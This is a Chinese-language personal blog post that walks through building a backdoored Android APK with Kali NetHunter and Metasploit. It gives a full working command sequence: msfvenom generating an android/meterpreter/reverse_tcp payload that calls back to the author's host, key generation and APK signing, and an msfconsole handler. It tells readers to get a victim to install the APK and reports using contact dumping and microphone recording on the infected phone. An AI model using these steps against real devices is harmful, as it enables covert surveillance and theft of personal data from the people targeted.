自從上次用android安裝完Kali Linux之後,就再也沒有啟動了,最近看到可以用Metasploit安裝Android後門程式的文章,所以就動手做看看,有很多文章影片都過時了, 下面這一篇經測試是目前可行的
https://resources.infosecinstitute.com/lab-hacking-an-android-device-with-msfvenom/#gref
但是預先要先安裝好工具,才不會中斷步驟,光是找工具安裝,我就遇了很多次坑,記錄下來避免忘記
安裝jdk,一開始以為內建java 會有,結果只有內建jre,所以jarsigner不會有
sudo apt-get install openjdk-11-jdk
然後就會找不到…會有很多文章要你換source.list的路徑,又或是sudo add-apt-repository,然後就一直找不到…
正解是
sudo apt install software-properties-common
sudo apt-get install openjdk-11-jdk
sudo apt-get install zipalign
如果安裝有出錯,就先sudo apt-get update
好了之後,就可以開啟手機的Kali Linux Terminal視窗進行apk的封裝,IP換成自己的,port 用文章上的
我的手機APP termux
nethunter
kex start
然後用VNC Client連手機open Terminal,產生apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 R > android_shell.apk
產生key,會要你打一些基本資料和密碼
keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
簽名 驗章 加簽
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked
jarsigner -verify -verbose -certs android_shell.apk
產生簽章過的檔案
zipalign -v 4 android_shell.apk singed_jar.apk
完成後就把singed_jar.apk想辦法讓victim 受害者 安裝,但是Metasploit 產生的檔案已經被列管了,郵寄和安裝下載都會出現警告,預設安裝是裝不起來的,如果有人安裝了,就可以回到我們的msfconsole來操控,文章是寫run,但是我是用exploit,可以用我就沒試有什麼不同,打help有一些命令可以使用,我最先試的是相機功能webcam_stream,結果圖片出不來,通訊錄dump_contacts可以匯出,可以錄聲音record_mic
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost = 192.168.0.10
set lport = 4444
exploit
help
留言